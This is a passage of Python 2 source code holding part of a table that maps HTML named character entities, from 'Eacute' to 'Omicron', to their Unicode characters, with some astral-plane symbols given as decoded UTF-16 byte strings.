u'Eacute': u'\xc9',
u'eacute': u'\xe9',
u'easter': u'\u2a6e',
u'Ecaron': u'\u011a',
u'ecaron': u'\u011b',
u'ecir': u'\u2256',
u'Ecirc': u'\xca',
u'ecirc': u'\xea',
u'ecolon': u'\u2255',
u'Ecy': u'\u042d',
u'ecy': u'\u044d',
u'eDDot': u'\u2a77',
u'Edot': u'\u0116',
u'eDot': u'\u2251',
u'edot': u'\u0117',
u'ee': u'\u2147',
u'efDot': u'\u2252',
u'Efr': '5\xd8\x08\xdd'.decode("utf-16-le"),
u'efr': '5\xd8"\xdd'.decode("utf-16-le"),
u'eg': u'\u2a9a',
u'Egrave': u'\xc8',
u'egrave': u'\xe8',
u'egs': u'\u2a96',
u'egsdot': u'\u2a98',
u'el': u'\u2a99',
u'Element': u'\u2208',
u'elinters': u'\u23e7',
u'ell': u'\u2113',
u'els': u'\u2a95',
u'elsdot': u'\u2a97',
u'Emacr': u'\u0112',
u'emacr': u'\u0113',
u'empty': u'\u2205',
u'emptyset': u'\u2205',
u'EmptySmallSquare': u'\u25fb',
u'emptyv': u'\u2205',
u'EmptyVerySmallSquare': u'\u25ab',
u'emsp13': u'\u2004',
u'emsp14': u'\u2005',
u'emsp': u'\u2003',
u'ENG': u'\u014a',
u'eng': u'\u014b',
u'ensp': u'\u2002',
u'Eogon': u'\u0118',
u'eogon': u'\u0119',
u'Eopf': '5\xd8<\xdd'.decode("utf-16-le"),
u'eopf': '5\xd8V\xdd'.decode("utf-16-le"),
u'epar': u'\u22d5',
u'eparsl': u'\u29e3',
u'eplus': u'\u2a71',
u'epsi': u'\u03b5',
u'Epsilon': u'\u0395',
u'epsilon': u'\u03b5',
u'epsiv': u'\u03f5',
u'eqcirc': u'\u2256',
u'eqcolon': u'\u2255',
u'eqsim': u'\u2242',
u'eqslantgtr': u'\u2a96',
u'eqslantless': u'\u2a95',
u'Equal': u'\u2a75',
u'equals': u'=',
u'EqualTilde': u'\u2242',
u'equest': u'\u225f',
u'Equilibrium': u'\u21cc',
u'equiv': u'\u2261',
u'equivDD': u'\u2a78',
u'eqvparsl': u'\u29e5',
u'erarr': u'\u2971',
u'erDot': u'\u2253',
u'Escr': u'\u2130',
u'escr': u'\u212f',
u'esdot': u'\u2250',
u'Esim': u'\u2a73',
u'esim': u'\u2242',
u'Eta': u'\u0397',
u'eta': u'\u03b7',
u'ETH': u'\xd0',
u'eth': u'\xf0',
u'Euml': u'\xcb',
u'euml': u'\xeb',
u'euro': u'\u20ac',
u'excl': u'!',
u'exist': u'\u2203',
u'Exists': u'\u2203',
u'expectation': u'\u2130',
u'ExponentialE': u'\u2147',
u'exponentiale': u'\u2147',
u'fallingdotseq': u'\u2252',
u'Fcy': u'\u0424',
u'fcy': u'\u0444',
u'female': u'\u2640',
u'ffilig': u'\ufb03',
u'fflig': u'\ufb00',
u'ffllig': u'\ufb04',
u'Ffr': '5\xd8\t\xdd'.decode("utf-16-le"),
u'ffr': '5\xd8#\xdd'.decode("utf-16-le"),
u'filig': u'\ufb01',
u'FilledSmallSquare': u'\u25fc',
u'FilledVerySmallSquare': u'\u25aa',
u'fjlig': u'fj',
u'flat': u'\u266d',
u'fllig': u'\ufb02',
u'fltns': u'\u25b1',
u'fnof': u'\u0192',
u'Fopf': '5\xd8=\xdd'.decode("utf-16-le"),
u'fopf': '5\xd8W\xdd'.decode("utf-16-le"),
u'ForAll': u'\u2200',
u'forall': u'\u2200',
u'fork': u'\u22d4',
u'forkv': u'\u2ad9',
u'Fouriertrf': u'\u2131',
u'fpartint': u'\u2a0d',
u'frac12': u'\xbd',
u'frac13': u'\u2153',
u'frac14': u'\xbc',
u'frac15': u'\u2155',
u'frac16': u'\u2159',
u'frac18': u'\u215b',
u'frac23': u'\u2154',
u'frac25': u'\u2156',
u'frac34': u'\xbe',
u'frac35': u'\u2157',
u'frac38': u'\u215c',
u'frac45': u'\u2158',
u'frac56': u'\u215a',
u'frac58': u'\u215d',
u'frac78': u'\u215e',
u'frasl': u'\u2044',
u'frown': u'\u2322',
u'Fscr': u'\u2131',
u'fscr': '5\xd8\xbb\xdc'.decode("utf-16-le"),
u'gacute': u'\u01f5',
u'Gamma': u'\u0393',
u'gamma': u'\u03b3',
u'Gammad': u'\u03dc',
u'gammad': u'\u03dd',
u'gap': u'\u2a86',
u'Gbreve': u'\u011e',
u'gbreve': u'\u011f',
u'Gcedil': u'\u0122',
u'Gcirc': u'\u011c',
u'gcirc': u'\u011d',
u'Gcy': u'\u0413',
u'gcy': u'\u0433',
u'Gdot': u'\u0120',
u'gdot': u'\u0121',
u'gE': u'\u2267',
u'ge': u'\u2265',
u'gEl': u'\u2a8c',
u'gel': u'\u22db',
u'geq': u'\u2265',
u'geqq': u'\u2267',
u'geqslant': u'\u2a7e',
u'ges': u'\u2a7e',
u'gescc': u'\u2aa9',
u'gesdot': u'\u2a80',
u'gesdoto': u'\u2a82',
u'gesdotol': u'\u2a84',
u'gesl': u'\u22db\ufe00',
u'gesles': u'\u2a94',
u'Gfr': '5\xd8\n\xdd'.decode("utf-16-le"),
u'gfr': '5\xd8$\xdd'.decode("utf-16-le"),
u'Gg': u'\u22d9',
u'gg': u'\u226b',
u'ggg': u'\u22d9',
u'gimel': u'\u2137',
u'GJcy': u'\u0403',
u'gjcy': u'\u0453',
u'gl': u'\u2277',
u'gla': u'\u2aa5',
u'glE': u'\u2a92',
u'glj': u'\u2aa4',
u'gnap': u'\u2a8a',
u'gnapprox': u'\u2a8a',
u'gnE': u'\u2269',
u'gne': u'\u2a88',
u'gneq': u'\u2a88',
u'gneqq': u'\u2269',
u'gnsim': u'\u22e7',
u'Gopf': '5\xd8>\xdd'.decode("utf-16-le"),
u'gopf': '5\xd8X\xdd'.decode("utf-16-le"),
u'grave': u'`',
u'GreaterEqual': u'\u2265',
u'GreaterEqualLess': u'\u22db',
u'GreaterFullEqual': u'\u2267',
u'GreaterGreater': u'\u2aa2',
u'GreaterLess': u'\u2277',
u'GreaterSlantEqual': u'\u2a7e',
u'GreaterTilde': u'\u2273',
u'Gscr': '5\xd8\xa2\xdc'.decode("utf-16-le"),
u'gscr': u'\u210a',
u'gsim': u'\u2273',
u'gsime': u'\u2a8e',
u'gsiml': u'\u2a90',
u'GT': u'>',
u'gt': u'>',
u'Gt': u'\u226b',
u'gtcc': u'\u2aa7',
u'gtcir': u'\u2a7a',
u'gtdot': u'\u22d7',
u'gtlPar': u'\u2995',
u'gtquest': u'\u2a7c',
u'gtrapprox': u'\u2a86',
u'gtrarr': u'\u2978',
u'gtrdot': u'\u22d7',
u'gtreqless': u'\u22db',
u'gtreqqless': u'\u2a8c',
u'gtrless': u'\u2277',
u'gtrsim': u'\u2273',
u'gvertneqq': u'\u2269\ufe00',
u'gvnE': u'\u2269\ufe00',
u'Hacek': u'\u02c7',
u'hairsp': u'\u200a',
u'half': u'\xbd',
u'hamilt': u'\u210b',
u'HARDcy': u'\u042a',
u'hardcy': u'\u044a',
u'hArr': u'\u21d4',
u'harr': u'\u2194',
u'harrcir': u'\u2948',
u'harrw': u'\u21ad',
u'Hat': u'^',
u'hbar': u'\u210f',
u'Hcirc': u'\u0124',
u'hcirc': u'\u0125',
u'hearts': u'\u2665',
u'heartsuit': u'\u2665',
u'hellip': u'\u2026',
u'hercon': u'\u22b9',
u'Hfr': u'\u210c',
u'hfr': '5\xd8%\xdd'.decode("utf-16-le"),
u'HilbertSpace': u'\u210b',
u'hksearow': u'\u2925',
u'hkswarow': u'\u2926',
u'hoarr': u'\u21ff',
u'homtht': u'\u223b',
u'hookleftarrow': u'\u21a9',
u'hookrightarrow': u'\u21aa',
u'Hopf': u'\u210d',
u'hopf': '5\xd8Y\xdd'.decode("utf-16-le"),
u'horbar': u'\u2015',
u'HorizontalLine': u'\u2500',
u'Hscr': u'\u210b',
u'hscr': '5\xd8\xbd\xdc'.decode("utf-16-le"),
u'hslash': u'\u210f',
u'Hstrok': u'\u0126',
u'hstrok': u'\u0127',
u'HumpDownHump': u'\u224e',
u'HumpEqual': u'\u224f',
u'hybull': u'\u2043',
u'hyphen': u'\u2010',
u'Iacute': u'\xcd',
u'iacute': u'\xed',
u'ic': u'\u2063',
u'Icirc': u'\xce',
u'icirc': u'\xee',
u'Icy': u'\u0418',
u'icy': u'\u0438',
u'Idot': u'\u0130',
u'IEcy': u'\u0415',
u'iecy': u'\u0435',
u'iexcl': u'\xa1',
u'iff': u'\u21d4',
u'Ifr': u'\u2111',
u'ifr': '5\xd8&\xdd'.decode("utf-16-le"),
u'Igrave': u'\xcc',
u'igrave': u'\xec',
u'ii': u'\u2148',
u'iiiint': u'\u2a0c',
u'iiint': u'\u222d',
u'iinfin': u'\u29dc',
u'iiota': u'\u2129',
u'IJlig': u'\u0132',
u'ijlig': u'\u0133',
u'Im': u'\u2111',
u'Imacr': u'\u012a',
u'imacr': u'\u012b',
u'image': u'\u2111',
u'ImaginaryI': u'\u2148',
u'imagline': u'\u2110',
u'imagpart': u'\u2111',
u'imath': u'\u0131',
u'imof': u'\u22b7',
u'imped': u'\u01b5',
u'Implies': u'\u21d2',
u'in': u'\u2208',
u'incare': u'\u2105',
u'infin': u'\u221e',
u'infintie': u'\u29dd',
u'inodot': u'\u0131',
u'Int': u'\u222c',
u'int': u'\u222b',
u'intcal': u'\u22ba',
u'integers': u'\u2124',
u'Integral': u'\u222b',
u'intercal': u'\u22ba',
u'Intersection': u'\u22c2',
u'intlarhk': u'\u2a17',
u'intprod': u'\u2a3c',
u'InvisibleComma': u'\u2063',
u'InvisibleTimes': u'\u2062',
u'IOcy': u'\u0401',
u'iocy': u'\u0451',
u'Iogon': u'\u012e',
u'iogon': u'\u012f',
u'Iopf': '5\xd8@\xdd'.decode("utf-16-le"),
u'iopf': '5\xd8Z\xdd'.decode("utf-16-le"),
u'Iota': u'\u0399',
u'iota': u'\u03b9',
u'iprod': u'\u2a3c',
u'iquest': u'\xbf',
u'Iscr': u'\u2110',
u'iscr': '5\xd8\xbe\xdc'.decode("utf-16-le"),
u'isin': u'\u2208',
u'isindot': u'\u22f5',
u'isinE': u'\u22f9',
u'isins': u'\u22f4',
u'isinsv': u'\u22f3',
u'isinv': u'\u2208',
u'it': u'\u2062',
u'Itilde': u'\u0128',
u'itilde': u'\u0129',
u'Iukcy': u'\u0406',
u'iukcy': u'\u0456',
u'Iuml': u'\xcf',
u'iuml': u'\xef',
u'Jcirc': u'\u0134',
u'jcirc': u'\u0135',
u'Jcy': u'\u0419',
u'jcy': u'\u0439',
u'Jfr': '5\xd8\r\xdd'.decode("utf-16-le"),
u'jfr': '5\xd8\'\xdd'.decode("utf-16-le"),
u'jmath': u'\u0237',
u'Jopf': '5\xd8A\xdd'.decode("utf-16-le"),
u'jopf': '5\xd8[\xdd'.decode("utf-16-le"),
u'Jscr': '5\xd8\xa5\xdc'.decode("utf-16-le"),
u'jscr': '5\xd8\xbf\xdc'.decode("utf-16-le"),
u'Jsercy': u'\u0408',
u'jsercy': u'\u0458',
u'Jukcy': u'\u0404',
u'jukcy': u'\u0454',
u'Kappa': u'\u039a',
u'kappa': u'\u03ba',
u'kappav': u'\u03f0',
u'Kcedil': u'\u0136',
u'kcedil': u'\u0137',
u'Kcy': u'\u041a',
u'kcy': u'\u043a',
u'Kfr': '5\xd8\x0e\xdd'.decode("utf-16-le"),
u'kfr': '5\xd8(\xdd'.decode("utf-16-le"),
u'kgreen': u'\u0138',
u'KHcy': u'\u0425',
u'khcy': u'\u0445',
u'KJcy': u'\u040c',
u'kjcy': u'\u045c',
u'Kopf': '5\xd8B\xdd'.decode("utf-16-le"),
u'kopf': '5\xd8\\\xdd'.decode("utf-16-le"),
u'Kscr': '5\xd8\xa6\xdc'.decode("utf-16-le"),
u'kscr': '5\xd8\xc0\xdc'.decode("utf-16-le"),
u'lAarr': u'\u21da',
u'Lacute': u'\u0139',
u'lacute': u'\u013a',
u'laemptyv': u'\u29b4',
u'lagran': u'\u2112',
u'Lambda': u'\u039b',
u'lambda': u'\u03bb',
u'Lang': u'\u27ea',
u'lang': u'\u27e8',
u'langd': u'\u2991',
u'langle': u'\u27e8',
u'lap': u'\u2a85',
u'Laplacetrf': u'\u2112',
u'laquo': u'\xab',
u'Larr': u'\u219e',
u'lArr': u'\u21d0',
u'larr': u'\u2190',
u'larrb': u'\u21e4',
u'larrbfs': u'\u291f',
u'larrfs': u'\u291d',
u'larrhk': u'\u21a9',
u'larrlp': u'\u21ab',
u'larrpl': u'\u2939',
u'larrsim': u'\u2973',
u'larrtl': u'\u21a2',
u'lat': u'\u2aab',
u'lAtail': u'\u291b',
u'latail': u'\u2919',
u'late': u'\u2aad',
u'lates': u'\u2aad\ufe00',
u'lBarr': u'\u290e',
u'lbarr': u'\u290c',
u'lbbrk': u'\u2772',
u'lbrace': u'{',
u'lbrack': u'[',
u'lbrke': u'\u298b',
u'lbrksld': u'\u298f',
u'lbrkslu': u'\u298d',
u'Lcaron': u'\u013d',
u'lcaron': u'\u013e',
u'Lcedil': u'\u013b',
u'lcedil': u'\u013c',
u'lceil': u'\u2308',
u'lcub': u'{',
u'Lcy': u'\u041b',
u'lcy': u'\u043b',
u'ldca': u'\u2936',
u'ldquo': u'\u201c',
u'ldquor': u'\u201e',
u'ldrdhar': u'\u2967',
u'ldrushar': u'\u294b',
u'ldsh': u'\u21b2',
u'lE': u'\u2266',
u'le': u'\u2264',
u'LeftAngleBracket': u'\u27e8',
u'LeftArrow': u'\u2190',
u'Leftarrow': u'\u21d0',
u'leftarrow': u'\u2190',
u'LeftArrowBar': u'\u21e4',
u'LeftArrowRightArrow': u'\u21c6',
u'leftarrowtail': u'\u21a2',
u'LeftCeiling': u'\u2308',
u'LeftDoubleBracket': u'\u27e6',
u'LeftDownTeeVector': u'\u2961',
u'LeftDownVector': u'\u21c3',
u'LeftDownVectorBar': u'\u2959',
u'LeftFloor': u'\u230a',
u'leftharpoondown': u'\u21bd',
u'leftharpoonup': u'\u21bc',
u'leftleftarrows': u'\u21c7',
u'LeftRightArrow': u'\u2194',
u'Leftrightarrow': u'\u21d4',
u'leftrightarrow': u'\u2194',
u'leftrightarrows': u'\u21c6',
u'leftrightharpoons': u'\u21cb',
u'leftrightsquigarrow': u'\u21ad',
u'LeftRightVector': u'\u294e',
u'LeftTee': u'\u22a3',
u'LeftTeeArrow': u'\u21a4',
u'LeftTeeVector': u'\u295a',
u'leftthreetimes': u'\u22cb',
u'LeftTriangle': u'\u22b2',
u'LeftTriangleBar': u'\u29cf',
u'LeftTriangleEqual': u'\u22b4',
u'LeftUpDownVector': u'\u2951',
u'LeftUpTeeVector': u'\u2960',
u'LeftUpVector': u'\u21bf',
u'LeftUpVectorBar': u'\u2958',
u'LeftVector': u'\u21bc',
u'LeftVectorBar': u'\u2952',
u'lEg': u'\u2a8b',
u'leg': u'\u22da',
u'leq': u'\u2264',
u'leqq': u'\u2266',
u'leqslant': u'\u2a7d',
u'les': u'\u2a7d',
u'lescc': u'\u2aa8',
u'lesdot': u'\u2a7f',
u'lesdoto': u'\u2a81',
u'lesdotor': u'\u2a83',
u'lesg': u'\u22da\ufe00',
u'lesges': u'\u2a93',
u'lessapprox': u'\u2a85',
u'lessdot': u'\u22d6',
u'lesseqgtr': u'\u22da',
u'lesseqqgtr': u'\u2a8b',
u'LessEqualGreater': u'\u22da',
u'LessFullEqual': u'\u2266',
u'LessGreater': u'\u2276',
u'lessgtr': u'\u2276',
u'LessLess': u'\u2aa1',
u'lesssim': u'\u2272',
u'LessSlantEqual': u'\u2a7d',
u'LessTilde': u'\u2272',
u'lfisht': u'\u297c',
u'lfloor': u'\u230a',
u'Lfr': '5\xd8\x0f\xdd'.decode("utf-16-le"),
u'lfr': '5\xd8)\xdd'.decode("utf-16-le"),
u'lg': u'\u2276',
u'lgE': u'\u2a91',
u'lHar': u'\u2962',
u'lhard': u'\u21bd',
u'lharu': u'\u21bc',
u'lharul': u'\u296a',
u'lhblk': u'\u2584',
u'LJcy': u'\u0409',
u'ljcy': u'\u0459',
u'Ll': u'\u22d8',
u'll': u'\u226a',
u'llarr': u'\u21c7',
u'llcorner': u'\u231e',
u'Lleftarrow': u'\u21da',
u'llhard': u'\u296b',
u'lltri': u'\u25fa',
u'Lmidot': u'\u013f',
u'lmidot': u'\u0140',
u'lmoust': u'\u23b0',
u'lmoustache': u'\u23b0',
u'lnap': u'\u2a89',
u'lnapprox': u'\u2a89',
u'lnE': u'\u2268',
u'lne': u'\u2a87',
u'lneq': u'\u2a87',
u'lneqq': u'\u2268',
u'lnsim': u'\u22e6',
u'loang': u'\u27ec',
u'loarr': u'\u21fd',
u'lobrk': u'\u27e6',
u'LongLeftArrow': u'\u27f5',
u'Longleftarrow': u'\u27f8',
u'longleftarrow': u'\u27f5',
u'LongLeftRightArrow': u'\u27f7',
u'Longleftrightarrow': u'\u27fa',
u'longleftrightarrow': u'\u27f7',
u'longmapsto': u'\u27fc',
u'LongRightArrow': u'\u27f6',
u'Longrightarrow': u'\u27f9',
u'longrightarrow': u'\u27f6',
u'looparrowleft': u'\u21ab',
u'looparrowright': u'\u21ac',
u'lopar': u'\u2985',
u'Lopf': '5\xd8C\xdd'.decode("utf-16-le"),
u'lopf': '5\xd8]\xdd'.decode("utf-16-le"),
u'loplus': u'\u2a2d',
u'lotimes': u'\u2a34',
u'lowast': u'\u2217',
u'lowbar': u'_',
u'LowerLeftArrow': u'\u2199',
u'LowerRightArrow': u'\u2198',
u'loz': u'\u25ca',
u'lozenge': u'\u25ca',
u'lozf': u'\u29eb',
u'lpar': u'(',
u'lparlt': u'\u2993',
u'lrarr': u'\u21c6',
u'lrcorner': u'\u231f',
u'lrhar': u'\u21cb',
u'lrhard': u'\u296d',
u'lrm': u'\u200e',
u'lrtri': u'\u22bf',
u'lsaquo': u'\u2039',
u'Lscr': u'\u2112',
u'lscr': '5\xd8\xc1\xdc'.decode("utf-16-le"),
u'Lsh': u'\u21b0',
u'lsh': u'\u21b0',
u'lsim': u'\u2272',
u'lsime': u'\u2a8d',
u'lsimg': u'\u2a8f',
u'lsqb': u'[',
u'lsquo': u'\u2018',
u'lsquor': u'\u201a',
u'Lstrok': u'\u0141',
u'lstrok': u'\u0142',
u'LT': u'<',
u'lt': u'<',
u'Lt': u'\u226a',
u'ltcc': u'\u2aa6',
u'ltcir': u'\u2a79',
u'ltdot': u'\u22d6',
u'lthree': u'\u22cb',
u'ltimes': u'\u22c9',
u'ltlarr': u'\u2976',
u'ltquest': u'\u2a7b',
u'ltri': u'\u25c3',
u'ltrie': u'\u22b4',
u'ltrif': u'\u25c2',
u'ltrPar': u'\u2996',
u'lurdshar': u'\u294a',
u'luruhar': u'\u2966',
u'lvertneqq': u'\u2268\ufe00',
u'lvnE': u'\u2268\ufe00',
u'macr': u'\xaf',
u'male': u'\u2642',
u'malt': u'\u2720',
u'maltese': u'\u2720',
u'Map': u'\u2905',
u'map': u'\u21a6',
u'mapsto': u'\u21a6',
u'mapstodown': u'\u21a7',
u'mapstoleft': u'\u21a4',
u'mapstoup': u'\u21a5',
u'marker': u'\u25ae',
u'mcomma': u'\u2a29',
u'Mcy': u'\u041c',
u'mcy': u'\u043c',
u'mdash': u'\u2014',
u'mDDot': u'\u223a',
u'measuredangle': u'\u2221',
u'MediumSpace': u'\u205f',
u'Mellintrf': u'\u2133',
u'Mfr': '5\xd8\x10\xdd'.decode("utf-16-le"),
u'mfr': '5\xd8*\xdd'.decode("utf-16-le"),
u'mho': u'\u2127',
u'micro': u'\xb5',
u'mid': u'\u2223',
u'midast': u'*',
u'midcir': u'\u2af0',
u'middot': u'\xb7',
u'minus': u'\u2212',
u'minusb': u'\u229f',
u'minusd': u'\u2238',
u'minusdu': u'\u2a2a',
u'MinusPlus': u'\u2213',
u'mlcp': u'\u2adb',
u'mldr': u'\u2026',
u'mnplus': u'\u2213',
u'models': u'\u22a7',
u'Mopf': '5\xd8D\xdd'.decode("utf-16-le"),
u'mopf': '5\xd8^\xdd'.decode("utf-16-le"),
u'mp': u'\u2213',
u'Mscr': u'\u2133',
u'mscr': '5\xd8\xc2\xdc'.decode("utf-16-le"),
u'mstpos': u'\u223e',
u'Mu': u'\u039c',
u'mu': u'\u03bc',
u'multimap': u'\u22b8',
u'mumap': u'\u22b8',
u'nabla': u'\u2207',
u'Nacute': u'\u0143',
u'nacute': u'\u0144',
u'nang': u'\u2220\u20d2',
u'nap': u'\u2249',
u'napE': u'\u2a70\u0338',
u'napid': u'\u224b\u0338',
u'napos': u'\u0149',
u'napprox': u'\u2249',
u'natur': u'\u266e',
u'natural': u'\u266e',
u'naturals': u'\u2115',
u'nbsp': u'\xa0',
u'nbump': u'\u224e\u0338',
u'nbumpe': u'\u224f\u0338',
u'ncap': u'\u2a43',
u'Ncaron': u'\u0147',
u'ncaron': u'\u0148',
u'Ncedil': u'\u0145',
u'ncedil': u'\u0146',
u'ncong': u'\u2247',
u'ncongdot': u'\u2a6d\u0338',
u'ncup': u'\u2a42',
u'Ncy': u'\u041d',
u'ncy': u'\u043d',
u'ndash': u'\u2013',
u'ne': u'\u2260',
u'nearhk': u'\u2924',
u'neArr': u'\u21d7',
u'nearr': u'\u2197',
u'nearrow': u'\u2197',
u'nedot': u'\u2250\u0338',
u'NegativeMediumSpace': u'\u200b',
u'NegativeThickSpace': u'\u200b',
u'NegativeThinSpace': u'\u200b',
u'NegativeVeryThinSpace': u'\u200b',
u'nequiv': u'\u2262',
u'nesear': u'\u2928',
u'nesim': u'\u2242\u0338',
u'NestedGreaterGreater': u'\u226b',
u'NestedLessLess': u'\u226a',
u'NewLine': u'\n',
u'nexist': u'\u2204',
u'nexists': u'\u2204',
u'Nfr': '5\xd8\x11\xdd'.decode("utf-16-le"),
u'nfr': '5\xd8+\xdd'.decode("utf-16-le"),
u'ngE': u'\u2267\u0338',
u'nge': u'\u2271',
u'ngeq': u'\u2271',
u'ngeqq': u'\u2267\u0338',
u'ngeqslant': u'\u2a7e\u0338',
u'nges': u'\u2a7e\u0338',
u'nGg': u'\u22d9\u0338',
u'ngsim': u'\u2275',
u'nGt': u'\u226b\u20d2',
u'ngt': u'\u226f',
u'ngtr': u'\u226f',
u'nGtv': u'\u226b\u0338',
u'nhArr': u'\u21ce',
u'nharr': u'\u21ae',
u'nhpar': u'\u2af2',
u'ni': u'\u220b',
u'nis': u'\u22fc',
u'nisd': u'\u22fa',
u'niv': u'\u220b',
u'NJcy': u'\u040a',
u'njcy': u'\u045a',
u'nlArr': u'\u21cd',
u'nlarr': u'\u219a',
u'nldr': u'\u2025',
u'nlE': u'\u2266\u0338',
u'nle': u'\u2270',
u'nLeftarrow': u'\u21cd',
u'nleftarrow': u'\u219a',
u'nLeftrightarrow': u'\u21ce',
u'nleftrightarrow': u'\u21ae',
u'nleq': u'\u2270',
u'nleqq': u'\u2266\u0338',
u'nleqslant': u'\u2a7d\u0338',
u'nles': u'\u2a7d\u0338',
u'nless': u'\u226e',
u'nLl': u'\u22d8\u0338',
u'nlsim': u'\u2274',
u'nLt': u'\u226a\u20d2',
u'nlt': u'\u226e',
u'nltri': u'\u22ea',
u'nltrie': u'\u22ec',
u'nLtv': u'\u226a\u0338',
u'nmid': u'\u2224',
u'NoBreak': u'\u2060',
u'NonBreakingSpace': u'\xa0',
u'Nopf': u'\u2115',
u'nopf': '5\xd8_\xdd'.decode("utf-16-le"),
u'not': u'\xac',
u'Not': u'\u2aec',
u'NotCongruent': u'\u2262',
u'NotCupCap': u'\u226d',
u'NotDoubleVerticalBar': u'\u2226',
u'NotElement': u'\u2209',
u'NotEqual': u'\u2260',
u'NotEqualTilde': u'\u2242\u0338',
u'NotExists': u'\u2204',
u'NotGreater': u'\u226f',
u'NotGreaterEqual': u'\u2271',
u'NotGreaterFullEqual': u'\u2267\u0338',
u'NotGreaterGreater': u'\u226b\u0338',
u'NotGreaterLess': u'\u2279',
u'NotGreaterSlantEqual': u'\u2a7e\u0338',
u'NotGreaterTilde': u'\u2275',
u'NotHumpDownHump': u'\u224e\u0338',
u'NotHumpEqual': u'\u224f\u0338',
u'notin': u'\u2209',
u'notindot': u'\u22f5\u0338',
u'notinE': u'\u22f9\u0338',
u'notinva': u'\u2209',
u'notinvb': u'\u22f7',
u'notinvc': u'\u22f6',
u'NotLeftTriangle': u'\u22ea',
u'NotLeftTriangleBar': u'\u29cf\u0338',
u'NotLeftTriangleEqual': u'\u22ec',
u'NotLess': u'\u226e',
u'NotLessEqual': u'\u2270',
u'NotLessGreater': u'\u2278',
u'NotLessLess': u'\u226a\u0338',
u'NotLessSlantEqual': u'\u2a7d\u0338',
u'NotLessTilde': u'\u2274',
u'NotNestedGreaterGreater': u'\u2aa2\u0338',
u'NotNestedLessLess': u'\u2aa1\u0338',
u'notni': u'\u220c',
u'notniva': u'\u220c',
u'notnivb': u'\u22fe',
u'notnivc': u'\u22fd',
u'NotPrecedes': u'\u2280',
u'NotPrecedesEqual': u'\u2aaf\u0338',
u'NotPrecedesSlantEqual': u'\u22e0',
u'NotReverseElement': u'\u220c',
u'NotRightTriangle': u'\u22eb',
u'NotRightTriangleBar': u'\u29d0\u0338',
u'NotRightTriangleEqual': u'\u22ed',
u'NotSquareSubset': u'\u228f\u0338',
u'NotSquareSubsetEqual': u'\u22e2',
u'NotSquareSuperset': u'\u2290\u0338',
u'NotSquareSupersetEqual': u'\u22e3',
u'NotSubset': u'\u2282\u20d2',
u'NotSubsetEqual': u'\u2288',
u'NotSucceeds': u'\u2281',
u'NotSucceedsEqual': u'\u2ab0\u0338',
u'NotSucceedsSlantEqual': u'\u22e1',
u'NotSucceedsTilde': u'\u227f\u0338',
u'NotSuperset': u'\u2283\u20d2',
u'NotSupersetEqual': u'\u2289',
u'NotTilde': u'\u2241',
u'NotTildeEqual': u'\u2244',
u'NotTildeFullEqual': u'\u2247',
u'NotTildeTilde': u'\u2249',
u'NotVerticalBar': u'\u2224',
u'npar': u'\u2226',
u'nparallel': u'\u2226',
u'nparsl': u'\u2afd\u20e5',
u'npart': u'\u2202\u0338',
u'npolint': u'\u2a14',
u'npr': u'\u2280',
u'nprcue': u'\u22e0',
u'npre': u'\u2aaf\u0338',
u'nprec': u'\u2280',
u'npreceq': u'\u2aaf\u0338',
u'nrArr': u'\u21cf',
u'nrarr': u'\u219b',
u'nrarrc': u'\u2933\u0338',
u'nrarrw': u'\u219d\u0338',
u'nRightarrow': u'\u21cf',
u'nrightarrow': u'\u219b',
u'nrtri': u'\u22eb',
u'nrtrie': u'\u22ed',
u'nsc': u'\u2281',
u'nsccue': u'\u22e1',
u'nsce': u'\u2ab0\u0338',
u'Nscr': '5\xd8\xa9\xdc'.decode("utf-16-le"),
u'nscr': '5\xd8\xc3\xdc'.decode("utf-16-le"),
u'nshortmid': u'\u2224',
u'nshortparallel': u'\u2226',
u'nsim': u'\u2241',
u'nsime': u'\u2244',
u'nsimeq': u'\u2244',
u'nsmid': u'\u2224',
u'nspar': u'\u2226',
u'nsqsube': u'\u22e2',
u'nsqsupe': u'\u22e3',
u'nsub': u'\u2284',
u'nsubE': u'\u2ac5\u0338',
u'nsube': u'\u2288',
u'nsubset': u'\u2282\u20d2',
u'nsubseteq': u'\u2288',
u'nsubseteqq': u'\u2ac5\u0338',
u'nsucc': u'\u2281',
u'nsucceq': u'\u2ab0\u0338',
u'nsup': u'\u2285',
u'nsupE': u'\u2ac6\u0338',
u'nsupe': u'\u2289',
u'nsupset': u'\u2283\u20d2',
u'nsupseteq': u'\u2289',
u'nsupseteqq': u'\u2ac6\u0338',
u'ntgl': u'\u2279',
u'Ntilde': u'\xd1',
u'ntilde': u'\xf1',
u'ntlg': u'\u2278',
u'ntriangleleft': u'\u22ea',
u'ntrianglelefteq': u'\u22ec',
u'ntriangleright': u'\u22eb',
u'ntrianglerighteq': u'\u22ed',
u'Nu': u'\u039d',
u'nu': u'\u03bd',
u'num': u'#',
u'numero': u'\u2116',
u'numsp': u'\u2007',
u'nvap': u'\u224d\u20d2',
u'nVDash': u'\u22af',
u'nVdash': u'\u22ae',
u'nvDash': u'\u22ad',
u'nvdash': u'\u22ac',
u'nvge': u'\u2265\u20d2',
u'nvgt': u'>\u20d2',
u'nvHarr': u'\u2904',
u'nvinfin': u'\u29de',
u'nvlArr': u'\u2902',
u'nvle': u'\u2264\u20d2',
u'nvlt': u'<\u20d2',
u'nvltrie': u'\u22b4\u20d2',
u'nvrArr': u'\u2903',
u'nvrtrie': u'\u22b5\u20d2',
u'nvsim': u'\u223c\u20d2',
u'nwarhk': u'\u2923',
u'nwArr': u'\u21d6',
u'nwarr': u'\u2196',
u'nwarrow': u'\u2196',
u'nwnear': u'\u2927',
u'Oacute': u'\xd3',
u'oacute': u'\xf3',
u'oast': u'\u229b',
u'ocir': u'\u229a',
u'Ocirc': u'\xd4',
u'ocirc': u'\xf4',
u'Ocy': u'\u041e',
u'ocy': u'\u043e',
u'odash': u'\u229d',
u'Odblac': u'\u0150',
u'odblac': u'\u0151',
u'odiv': u'\u2a38',
u'odot': u'\u2299',
u'odsold': u'\u29bc',
u'OElig': u'\u0152',
u'oelig': u'\u0153',
u'ofcir': u'\u29bf',
u'Ofr': '5\xd8\x12\xdd'.decode("utf-16-le"),
u'ofr': '5\xd8,\xdd'.decode("utf-16-le"),
u'ogon': u'\u02db',
u'Ograve': u'\xd2',
u'ograve': u'\xf2',
u'ogt': u'\u29c1',
u'ohbar': u'\u29b5',
u'ohm': u'\u03a9',
u'oint': u'\u222e',
u'olarr': u'\u21ba',
u'olcir': u'\u29be',
u'olcross': u'\u29bb',
u'oline': u'\u203e',
u'olt': u'\u29c0',
u'Omacr': u'\u014c',
u'omacr': u'\u014d',
u'Omega': u'\u03a9',
u'omega': u'\u03c9',
u'Omicron': u'\u039f',
